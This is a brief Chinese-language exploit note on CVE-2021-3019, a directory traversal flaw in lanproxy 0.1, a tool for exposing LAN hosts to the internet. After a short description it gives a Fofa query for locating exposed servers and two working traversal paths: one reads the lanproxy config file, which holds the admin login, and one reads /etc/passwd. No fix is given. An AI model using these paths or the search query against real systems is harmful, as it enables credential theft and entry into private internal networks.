（CVE-2021-3019）lanproxy 目录遍历漏洞

漏洞描述

lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具。攻击者通过构造恶意请求，可直接获取到lanproxy配置文件，从而登录lanproxy管理后台进入内网。

影响版本

lanproxy 0.1

Fofa

header= "Server: LPS-0.1"

漏洞利用

读取配置文件
POC：

/../conf/config.properties

读取/etc/passwd

/../../../../../../../../../../etc/passwd